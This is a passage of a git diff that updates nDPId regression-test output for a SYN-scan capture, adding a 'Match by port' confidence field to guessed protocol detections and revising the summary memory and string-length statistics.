 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5214,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5214,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00598{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":935,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1119,"l4_proto":"tcp","ndpi": {"proto":"Starcraft","breed":"Fun","category":"Game"}}
+00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":935,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1119,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Starcraft","breed":"Fun","category":"Game"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":935,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":805,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3168,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":805,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3168,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -7778,9 +7778,9 @@
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9415,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00602{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9418,"l4_proto":"tcp","ndpi": {"proto":"Git","breed":"Safe","category":"Collaborative"}}
+00638{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9418,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Git","breed":"Safe","category":"Collaborative"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9418,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00602{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9418,"l4_proto":"tcp","ndpi": {"proto":"Git","breed":"Safe","category":"Collaborative"}}
+00638{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9418,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Git","breed":"Safe","category":"Collaborative"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9418,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1233,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1233,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -7824,13 +7824,13 @@
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1698,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7402,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1698,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7402,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00603{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3306,"l4_proto":"tcp","ndpi": {"proto":"MySQL","breed":"Acceptable","category":"Database"}}
+00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3306,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"MySQL","breed":"Acceptable","category":"Database"}}
 00570{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3306,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7402,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7402,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1259,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1259,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00604{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3306,"l4_proto":"tcp","ndpi": {"proto":"MySQL","breed":"Acceptable","category":"Database"}}
+00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3306,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"MySQL","breed":"Acceptable","category":"Database"}}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3306,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059406,"flow_last_seen":1278275059406,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1259,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059406,"flow_last_seen":1278275059406,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1259,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -7980,11 +7980,11 @@
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1665,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1334,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5431,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5431,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00611{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5432,"l4_proto":"tcp","ndpi": {"proto":"PostgreSQL","breed":"Acceptable","category":"Database"}}
+00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5432,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"PostgreSQL","breed":"Acceptable","category":"Database"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5431,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5431,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00611{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5432,"l4_proto":"tcp","ndpi": {"proto":"PostgreSQL","breed":"Acceptable","category":"Database"}}
+00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5432,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"PostgreSQL","breed":"Acceptable","category":"Database"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00160{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","total-events-serialized":7989}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
@@ -7995,10 +7995,10 @@
 ~~ total active/idle flows...: 1994/1994
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 7044748 bytes
-~~ total memory freed........: 7044748 bytes
-~~ total allocations/frees...: 107543/107543
+~~ total memory allocated....: 6475997 bytes
+~~ total memory freed........: 6475997 bytes
+~~ total allocations/frees...: 109133/109133
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 165 chars
-~~ json string max len.......: 708 chars
-~~ json string avg len.......: 506 chars
+~~ json string max len.......: 813 chars
+~~ json string avg len.......: 558 chars
diff --git a/test/results/syslog.pcapng.out b/test/results/syslog.pcapng.out
index 32e2704f1..ef15788af 100644
--- a/test/results/syslog.pcapng.out
+++ b/test/results/syslog.pcapng.out
@@ -1,45 +1,45 @@
